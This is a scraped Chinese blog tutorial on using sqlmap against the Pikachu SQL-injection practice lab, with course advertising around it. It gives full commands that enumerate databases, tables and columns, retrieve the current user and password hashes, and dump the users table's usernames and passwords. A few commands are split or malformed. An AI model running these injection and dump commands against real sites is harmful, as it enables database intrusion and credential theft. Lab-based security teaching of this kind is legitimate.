sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了_sqlmap使用教程

最新推荐文章于 2024-09-26 16:29:22 发布
最新推荐文章于 2024-09-26 16:29:22 发布
阅读量713 收藏 21
点赞数 17
分类专栏: 程序员 文章标签: go 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84919661/article/details/138773508
版权

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

  • 注入命令

sqlmap -u “http://192.168.1.168/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql --current-user --current-db --is-dba --passwords -v 1



![](https://img-blog.csdnimg.cn/img_convert/12f8f744588449c3ba7ebe692ff54ba8.png)


![](https://img-blog.csdnimg.cn/img_convert/3585e81268b6cb349117d553304a95eb.png)


**三、获取所有库**


* 所需参数
* –dbms:指定数据库类型
* –dbs:列出所有数据库
* 注入命令
* ```
sqlmap -u "http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -v 1 --dbms mysql --batch --dbs

四、获取表信息

  • 所需参数
  • -D:指定库
  • –tables:列出所有表
  • 注入命令

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu --tables



![](https://img-blog.csdnimg.cn/img_convert/1f81b6f1f954675a64d299fbe6d2196e.png)


**五、获取表的字段**


* 所需参数
* -T:指定某个表
* –columns:获取字段
* 注入命令
* ```
sqlmap -u "http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu -T users --columns

六、获取某个库的所有表的所有字段

  • 所需参数
  • -tables:枚举指定数据库中的所有表
  • –columns:用于枚举指定表中的所有列
  • 注入命令

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu -tables --columns



![](https://img-blog.csdnimg.cn/img_convert/c97a0467158d1fc96ee83ad50f0fe7ea.png)


**七、获取数据**


* 所需参数
* –dump:导出数据所有内容
* –dump -C “username,password”:获取字段的内容
* 获取指定库所有表所有字段内容
* ```
sqlmap -u "http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu -tables --columns --dump

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

  • 获取指定表的所有字段内容

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu -T users --columns --dump



![](https://img-blog.csdnimg.cn/img_convert/95ab64e30bebeea24664e6e6621a992d.png)


![外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传](https://img-home.csdnimg.cn/images/20230724024159.png?origin_url=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ft88ugf2jgYDvbRtUyXvuKVGGhBqCX6fhNriciaKqpWv43l9xjfqQEZ4wHDmt1MZl9Y7IG3n7tIScq44Bewc6licEg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&pos_id=img-1z1mM1QO-1710297333244)


* 获取指定表,指定字段内容
* sername,password" --dump
* ```
sqlmap -u "http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu -T users -C "id,u

八、获取指定条数

  • 所需参数
  • –count:告诉sqlmap仅执行一个查询来估算表中的行数。通常用于快速判断表是否为空或包含多少条记录。
  • –start 1:从第一条记录开始提取数据。
  • –stop 3:提取到第三条记录为止。
  • 获取总条数

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu -T users --count



![](https://img-blog.csdnimg.cn/img_convert/12133e28f8fba241e43128dfaa7d1331.png)


* 获取指定id条数
* ```
sqlmap -u "http://192.168.1.107/pikachu/vul/sqli/sqli_str.php name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu -T users --dump --start 1 --stop 3

九、删除缓存文件

  • 所需参数:–flush-session
  • 如果不想用之前缓存这个目标的session文件,可以使用这个参数。 会清空之前的session,重新测试该目标。

十、安全的删除output目录的文件

  • 所需参数:–purge-output
  • 有时需要删除结果文件,而不被恢复,可以使用此参数,原有文件将会被随机的一些文件覆盖。

`黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

不再深入研究,那么很难做到真正的技术提升。**

需要这份系统化的资料的朋友,可以添加戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84919661
关注
专栏目录
[网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码(一)
杨秀璋的专栏
09-20 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了虚拟机VMware+Kali安装入门Sqlmap基本用法,这篇文章将分享Wireshark安装入门,并讲解一个抓取网站用户名和密码的案例。 Wireshark作为网络分析的最佳利器之一,非常推荐网络安全初学者学习。作者作为网络安全的小白,分享一些自学教程供大家学习,后续也将深入学习网络安全和系统安全相关知识并分享相关实验。希望对初学者有帮助,大神请飘过,谢谢各位看官!
【网络安全】零基础入门网络安全劝退指北
互联网老辛
04-17 3419
作为从16年接触网络安全的小白,谈谈零基础如何入门网络安全,有不对的地方,请多多指教。 这些年最后悔的事情莫过于没有把自己学习的东西积累下来形成一个知识体系。 后续我也会陆续的整理网络安全的相关学习资料及文章,与大家一起探讨学习。 如何入门 简单了解网络安全 网络安全就是指的确保网络系统中的数据不被别人破坏,而网安工程师就是涉及程序来维护网络安全。 网安方向有很多职位,比如安全产品工程师,安全分析师,数据恢复工程师,网络架构工程师,安全编程工程师,以及网络集成工程师等。 工作内容主要包括: 安全评测,风
ClickHouse是如何批量写入的?
机器学习与系统
12-30 5813
简介批量写入又称为bulk write,对于单表插入多条数据的场景,可以减少插入请求数量,提高吞吐量和效率。clickhouse官方Golang驱动clickhouse-go[1]支持该...
2024年Go最全Go异常处理——defer、panic、recover,Golang零基础
2401_84920027的博客
05-11 478
事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!二、panic和recover(宕机和宕机恢复)
ZLMediaKit源码分析
最新发布
gitblog_06693的博客
09-26 442
ZLMediaKit源码分析 【下载地址】ZLMediaKit源码分析 ZLMediaKit源码分析 项目地址: https://gitcode.com/Open-source-documentation-tutorial/24d...
ZLMediaKit 服务器源码解读---RTSP推流拉流
小小东西的博客
02-09 6507
rtsp推流拉流过程
clickhouse批量插入数据
呆萌的代Ma
04-13 2228
按照如下模板进行插入: ```sql INSERT INTO 数据库.数据表 (列1,列2,列3) VALUES (列1的新数据, 列2的新数据, 列3的新数据), (列1的新数据, 列2的新数据, 列3的新数据), (列1的新数据, 列2的新数据, 列3的新数据), ```
OpenMV入门教程(非常详细)从零基础入门精通,看完这一篇就够
热门推荐
xnxqwzy的博客
08-20 1万+
OpenMV 是一个开源,低成本,功能强大的 机器视觉模块。OpenMV上的机器视觉算法包括 寻找色块、人脸检测、眼球跟踪、边缘检测、标志跟踪 等。以STM32F427CPU为核心,集成了OV7725摄像头芯片,在小巧的硬件模块上,用C语言高效地实现了核心机器视觉算法,提供Python编程接口。(这也就意味着,我们可以通过python来对他进行编程,所以我们就需要学习一点基础的python知识)上面是我们下载完 IDE 后进入的界面中间的这一块是我们的代码编辑框,我们可以在这里写代码。
2022年零基础自学网络安全/Web安全,看这一篇就够
欢迎来到技术宅的博客
03-09 4587
随手写写关于web安全的内容,希望对初次遇到web安全问题的同学提供帮助。
MacOS系统安装Docker(非常详细)从零基础入门精通,看完这一篇就够了_mac安装docker
2401_84182337的博客
04-12 892
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Go-GolangWebSocket框架
08-13
Golang WebSocket 框架
golang websocket
05-28
安装go revel框架的时候,golang.com/x/net中的包总是下不下来。放在这里方便大家使用。具体的使用方法就不累赘了,如有问题请给我发信。
python clickhouse批量插入数据
weixin_41460211的博客
07-03 217
Python,数据库相关视频讲解:python的or运算赋值用法用python编程Excel有没有用处?011_编程到底好玩在哪?查看python文件_输出py文件_cat_运行python文件_shelPython ClickHouse批量插入数据 ClickHouse是一款开源的面向列式存储的分布式数据库管理系统...
hive之HQL常用命令
qq_41275983的博客
09-26 1433
Hive之HQL常用命令 HQL常用命令Hive之HQL常用命令一、DDL数据定义1、创建数据库:2、查询数据库:3、修改数据库:4、删除数据库:5、创建表:6、分区表:7、修改表:8、删除表:二、DML数据操作1、向表中加载数据:2、插入数据:3、import的导入导出:4、数据导出5、清除表中数据:三、查询1、查询:2、算术运算符:+、-、*、/、%、&、|、^、~3、常用函数:4、limit语句:限制返回的函数,在sql语句最后一行;where语句:筛选条件;5、比较运算符:between、i
ZLMediaKit源码分析 - NotifyCenter
成长之路
07-17 1526
ZLMediaKit学习 - NoticeCenter
clickhouse 批量插入数据_ClickHouse常用命令
weixin_30444625的博客
01-10 1万+
一.安装使用ClickHouse是Yandex提供的一个开源的列式存储数据库管理系统,多用于联机分析(OLAP)场景,可提供海量数据的存储和分析,同时利用其数据压缩和向量化引擎的特性,能提供快速的数据搜索。Ⅰ).安装sudo yum install yum-utils sudo rpm --import https://repo.yandex.ru/clickhouse/CLICKHOUSE-KE...
ZLMediaKit源码分析(一)服务启动
cliffordl的专栏
06-08 5287
第二次调用setupEvent()在EventPollerPool::Instance().for_each()批量clone的时候,TcpServer::TcpServer()->Server::Server()->EventPollerPool::Instance()->TaskExecutorGetterImp::addPoller()已经批量创建了poller。Socket::_on_before_accept实际也调用的是TcpServer::_on_create_socket。
Golang安装和配置指南:从零开始的高效开发之旅
hitpter的专栏
10-16 536
Golang(又称Go)是一种快速、可靠且高效的编程语言,由Google开发并在开源社区广泛应用。Golang的设计目标是通过简洁的语法和强大的并发模型提供高效的开发体验。在本文中,我们将指导您如何安装和配置Golang,以便开始您的Golang开发之旅。
iBATIS SQLMap开发指南:从入门精通
iBATIS SQLMap 开发指南,中文版,主要涵盖了iBATIS SQLMap的配置、映射文件以及各种元素的使用。 iBATIS SQLMap 是一款强大的数据访问框架,它将SQL语句与Java代码分离,提供了一种灵活的方式来处理数据库操作。此...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值